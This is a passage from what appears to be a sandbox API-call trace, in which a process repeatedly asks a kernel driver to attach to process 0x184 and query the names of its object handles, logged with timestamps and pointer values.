(Object=0xfffffa80018b95d0) returned 0x182 [0221.359] ObQueryNameString (in: Object=0xfffff8a000c4b330, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.359] ObfDereferenceObject (Object=0xfffff8a000c4b330) returned 0x1 [0221.359] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.359] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.359] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.359] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.359] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.359] PsAcquireProcessExitSynchronization () returned 0x0 [0221.359] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.359] ObReferenceObjectByHandle (in: Handle=0x100, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000c4b6d0, HandleInformation=0x0) returned 0x0 [0221.359] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.360] PsReleaseProcessExitSynchronization () returned 0x2 [0221.360] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.360] ObQueryNameString (in: Object=0xfffff8a000c4b6d0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.360] ObfDereferenceObject (Object=0xfffff8a000c4b6d0) returned 0x1 [0221.360] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.360] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.360] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.360] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.360] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.360] PsAcquireProcessExitSynchronization () returned 0x0 [0221.360] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.360] ObReferenceObjectByHandle (in: Handle=0x104, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0011f3c50, HandleInformation=0x0) returned 0x0 [0221.361] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.361] PsReleaseProcessExitSynchronization () returned 0x2 [0221.361] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.361] ObQueryNameString (in: Object=0xfffff8a0011f3c50, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.361] ObfDereferenceObject (Object=0xfffff8a0011f3c50) returned 0x1 [0221.361] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.361] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.361] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.361] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.361] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.361] PsAcquireProcessExitSynchronization () returned 0x0 [0221.361] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.361] ObReferenceObjectByHandle (in: Handle=0x108, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000c6e410, HandleInformation=0x0) returned 0x0 [0221.361] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.361] PsReleaseProcessExitSynchronization () returned 0x2 [0221.361] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.361] ObQueryNameString (in: Object=0xfffff8a000c6e410, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.361] ObfDereferenceObject (Object=0xfffff8a000c6e410) returned 0x1 [0221.361] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.362] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.362] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.362] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.362] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.362] PsAcquireProcessExitSynchronization () returned 0x0 [0221.362] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.362] ObReferenceObjectByHandle (in: Handle=0x110, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000c4eed0, HandleInformation=0x0) returned 0x0 [0221.362] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.362] PsReleaseProcessExitSynchronization () returned 0x2 [0221.362] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.362] ObQueryNameString (in: Object=0xfffff8a000c4eed0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.362] ObfDereferenceObject (Object=0xfffff8a000c4eed0) returned 0x1 [0221.363] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.363] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.363] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.363] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.363] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.363] PsAcquireProcessExitSynchronization () returned 0x0 [0221.363] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.363] ObReferenceObjectByHandle (in: Handle=0x11c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000c80fc0, HandleInformation=0x0) returned 0x0 [0221.363] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.363] PsReleaseProcessExitSynchronization () returned 0x2 [0221.363] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.363] ObQueryNameString (in: Object=0xfffff8a000c80fc0, ObjectNameInfo=0xfffffa8003070044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003070044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.363] ObfDereferenceObject (Object=0xfffff8a000c80fc0) returned 0x1 [0221.363] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.363] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.363] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.363] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.363] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.363] PsAcquireProcessExitSynchronization () returned 0x0 [0221.363] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.363] ObReferenceObjectByHandle (in: Handle=0x120, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000c6f860, HandleInformation=0x0) returned 0x0 [0221.363] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.364] PsReleaseProcessExitSynchronization () returned 0x2 [0221.364] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.364] ObQueryNameString (in: Object=0xfffff8a000c6f860, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.364] ObfDereferenceObject (Object=0xfffff8a000c6f860) returned 0x1 [0221.364] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.364] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.364] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.364] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.364] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.364] PsAcquireProcessExitSynchronization () returned 0x0 [0221.364] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.364] ObReferenceObjectByHandle (in: Handle=0x124, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000c85750, HandleInformation=0x0) returned 0x0 [0221.364] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.364] PsReleaseProcessExitSynchronization () returned 0x2 [0221.364] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.364] ObQueryNameString (in: Object=0xfffff8a000c85750, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.364] ObfDereferenceObject (Object=0xfffff8a000c85750) returned 0x1 [0221.364] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.364] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.364] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.365] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.365] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.365] PsAcquireProcessExitSynchronization () returned 0x0 [0221.365] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.365] ObReferenceObjectByHandle (in: Handle=0x128, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001571650, HandleInformation=0x0) returned 0x0 [0221.365] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.365] PsReleaseProcessExitSynchronization () returned 0x2 [0221.365] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.365] ObQueryNameString (in: Object=0xfffff8a001571650, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.365] ObfDereferenceObject (Object=0xfffff8a001571650) returned 0x1 [0221.365] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.365] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.365] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.365] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.365] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.365] PsAcquireProcessExitSynchronization () returned 0x0 [0221.365] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.365] ObReferenceObjectByHandle (in: Handle=0x12c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0014b2af0, HandleInformation=0x0) returned 0x0 [0221.365] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.366] PsReleaseProcessExitSynchronization () returned 0x2 [0221.366] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.366] ObQueryNameString (in: Object=0xfffff8a0014b2af0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.366] ObfDereferenceObject (Object=0xfffff8a0014b2af0) returned 0x1 [0221.366] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.366] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.366] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.366] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.366] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.366] PsAcquireProcessExitSynchronization () returned 0x0 [0221.366] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.366] ObReferenceObjectByHandle (in: Handle=0x140, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000f6a890, HandleInformation=0x0) returned 0x0 [0221.366] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.366] PsReleaseProcessExitSynchronization () returned 0x2 [0221.366] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.366] ObQueryNameString (in: Object=0xfffff8a000f6a890, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.366] ObfDereferenceObject (Object=0xfffff8a000f6a890) returned 0x1 [0221.366] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.366] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.366] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.366] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.366] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.366] PsAcquireProcessExitSynchronization () returned 0x0 [0221.367] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.367] ObReferenceObjectByHandle (in: Handle=0x14c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000f8a750, HandleInformation=0x0) returned 0x0 [0221.367] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.367] PsReleaseProcessExitSynchronization () returned 0x2 [0221.367] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.367] ObQueryNameString (in: Object=0xfffff8a000f8a750, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.367] ObfDereferenceObject (Object=0xfffff8a000f8a750) returned 0x1 [0221.367] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.367] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.367] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.367] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.367] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.367] PsAcquireProcessExitSynchronization () returned 0x0 [0221.367] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.368] ObReferenceObjectByHandle (in: Handle=0x16c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000f8d4f0, HandleInformation=0x0) returned 0x0 [0221.368] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.368] PsReleaseProcessExitSynchronization () returned 0x2 [0221.368] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.368] ObQueryNameString (in: Object=0xfffff8a000f8d4f0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.368] ObfDereferenceObject (Object=0xfffff8a000f8d4f0) returned 0x1 [0221.368] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.368] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.368] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.368] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.368] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.368] PsAcquireProcessExitSynchronization () returned 0x0 [0221.368] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.368] ObReferenceObjectByHandle (in: Handle=0x174, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000f9e470, HandleInformation=0x0) returned 0x0 [0221.368] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.368] PsReleaseProcessExitSynchronization () returned 0x2 [0221.369] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.369] ObQueryNameString (in: Object=0xfffff8a000f9e470, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.369] ObfDereferenceObject (Object=0xfffff8a000f9e470) returned 0x1 [0221.369] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.369] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.369] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.369] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.369] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.369] PsAcquireProcessExitSynchronization () returned 0x0 [0221.369] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.369] ObReferenceObjectByHandle (in: Handle=0x17c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ff29f0, HandleInformation=0x0) returned 0x0 [0221.369] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.369] PsReleaseProcessExitSynchronization () returned 0x2 [0221.369] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.369] ObQueryNameString (in: Object=0xfffff8a000ff29f0, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.370] ObfDereferenceObject (Object=0xfffff8a000ff29f0) returned 0x1 [0221.370] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.370] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.370] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.370] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.370] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.370] PsAcquireProcessExitSynchronization () returned 0x0 [0221.370] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.370] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ffb110, HandleInformation=0x0) returned 0x0 [0221.370] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.370] PsReleaseProcessExitSynchronization () returned 0x2 [0221.370] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.370] ObQueryNameString (in: Object=0xfffff8a000ffb110, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.370] ObfDereferenceObject (Object=0xfffff8a000ffb110) returned 0x1 [0221.370] IofCompleteRequest (Irp=0xfffffa80018d8ee0, 